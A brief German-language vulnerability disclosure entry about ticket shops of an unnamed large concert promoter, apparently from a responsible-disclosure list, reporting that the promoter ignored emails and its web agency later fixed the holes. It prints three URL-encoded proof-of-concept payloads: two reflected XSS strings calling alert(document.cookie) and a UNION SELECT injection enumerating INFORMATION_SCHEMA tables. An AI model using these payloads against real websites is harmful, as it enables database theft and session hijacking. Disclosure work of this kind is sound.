Veranstaltungsunternehmen
.../search?q=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
?ticket_url=...%22%3E%3C/iframe%3E%3Chr%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
...?filter=2012-05%27%20UNION%20SELECT%201,table_name,3,4...27,28%20FROM%20INFORMATION_SCHEMA.tables%23
Mehrere Ticketshops eines großen Konzertveranstalters waren anfällig für SQL-Injections und XSS.
Der Veranstalter selbst reagierte nicht auf E-Mails.
Die Internetagentur des Veranstalters hat die Lücken schließlich geschlossen.